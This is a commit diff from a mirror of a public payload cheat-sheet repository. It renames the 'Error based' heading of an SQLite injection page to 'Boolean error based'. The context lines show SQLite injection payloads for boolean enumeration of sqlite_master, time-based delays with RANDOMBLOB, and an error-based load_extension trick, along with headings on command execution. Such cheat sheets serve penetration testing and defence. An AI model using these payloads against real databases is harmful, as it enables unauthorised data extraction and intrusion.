mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings
synced 2025-12-06 08:54:40 +01:00
Boolean error based* instead of just error based
This commit is contained in:
parent
0d9a2354e5
commit
f82efffbc7
1 changed files with 2 additions and 2 deletions
|
|
@ -11,7 +11,7 @@
|
||||||
* [Boolean - Enumerating table name](#boolean---enumerating-table-name)
|
* [Boolean - Enumerating table name](#boolean---enumerating-table-name)
|
||||||
* [Boolean - Extract info](#boolean---extract-info)
|
* [Boolean - Extract info](#boolean---extract-info)
|
||||||
* [Time based](#time-based)
|
* [Time based](#time-based)
|
||||||
* [Error based](#error-based)
|
* [Boolean error based](#boolean-error-based)
|
||||||
* [Remote Command Execution using SQLite command - Attach Database](#remote-command-execution-using-sqlite-command---attach-database)
|
* [Remote Command Execution using SQLite command - Attach Database](#remote-command-execution-using-sqlite-command---attach-database)
|
||||||
* [Remote Command Execution using SQLite command - Load_extension](#remote-command-execution-using-sqlite-command---load_extension)
|
* [Remote Command Execution using SQLite command - Load_extension](#remote-command-execution-using-sqlite-command---load_extension)
|
||||||
* [References](#references)
|
* [References](#references)
|
||||||
|
|
@ -78,7 +78,7 @@ and (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and
|
||||||
AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
|
AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
|
||||||
```
|
```
|
||||||
|
|
||||||
## Error based
|
## Boolean error based
|
||||||
|
|
||||||
```sql
|
```sql
|
||||||
AND CASE WHEN [BOOLEAN_QUERY] THEN 1 ELSE load_extension(1) END
|
AND CASE WHEN [BOOLEAN_QUERY] THEN 1 ELSE load_extension(1) END
|
||||||
|
|
|
||||||
Loading…
Reference in a new issue